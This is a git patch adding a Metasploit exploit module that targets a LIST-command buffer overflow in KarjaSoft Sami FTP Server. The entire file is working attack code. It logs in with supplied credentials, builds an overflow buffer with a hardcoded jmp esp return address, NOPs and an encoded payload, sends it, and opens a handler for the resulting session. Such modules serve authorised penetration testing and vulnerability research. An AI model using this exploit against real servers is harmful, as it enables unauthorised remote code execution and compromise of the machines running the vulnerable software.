From fa5c988110a87e63ff2446578aa3fce1a500d44c Mon Sep 17 00:00:00 2001 From: Doug P Date: Wed, 13 Mar 2013 17:27:02 -0400 Subject: [PATCH] got sami_ftpd_list.rb working --- .../exploits/windows/ftp/sami_ftpd_list.rb | 79 +++++++++++++++++++ 1 file changed, 79 insertions(+) create mode 100644 modules/exploits/windows/ftp/sami_ftpd_list.rb diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb new file mode 100644 index 0000000000..bc21d45760 --- /dev/null +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -0,0 +1,79 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + #include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'KarjaSoft Sami FTP Server LIST Overflow', + 'Description' => %q{ + A buffer overflow is triggered when a long LIST command is sent to the + server and the user views the Log tab. + }, + 'Author' => [ 'Doug Prostko ' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'OSVDB', '90815'], + [ 'EDB', '24557'], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'seh', + }, + 'Platform' => ['win'], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 950, + 'BadChars' => "\x00\x0a\x0d\x20\xff", + #'StackAdjustment' => -3500, + }, + 'Targets' => + [ + [ 'Universal', { 'Ret' => 0x10028283 } ], # jmp esp + ], + 'DisclosureDate' => 'Feb 27 2013')) + + register_options( + [ + Opt::RPORT(21), + OptString.new('FTPUSER', [ true, 'Valid FTP username', 'ftp' ]), + OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'ftp' ]) + ], self.class) + end + + def exploit + connect + + buf = rand_text_alphanumeric(219) + buf << [target.ret].pack("V") + buf << make_nops(50) + payload.encoded + sock.put("USER #{datastore['FTPUSER']}\r\n") + sock.put("PASS #{datastore['FTPPASS']}\r\n") + res = sock.get(-1,3) + if(res.match(/230 Access allowed\./)) + print_good("Login successful") + else + print_status("Bad username/password") + end + sleep 1 + + print_status("Sending evil LIST command") + sock.put("LIST #{buf}\r\n") + + handler + disconnect + end + +end